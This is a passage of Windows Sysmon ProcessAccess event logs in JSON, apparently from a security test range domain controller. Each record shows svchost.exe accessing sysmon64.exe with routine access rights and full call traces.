EM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.459","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4970,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.459\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.459","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4971,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.459\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.459","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4972,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.459\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.459","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4973,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.459\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.459","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4974,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.459\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.459","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4975,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.459\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.459","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4976,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.459\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.459","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4977,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.459\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 